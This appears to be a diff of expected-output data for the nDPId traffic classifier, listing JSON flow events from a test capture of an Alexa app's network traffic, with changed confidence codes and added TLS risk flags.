+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00930{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
-00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
+00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
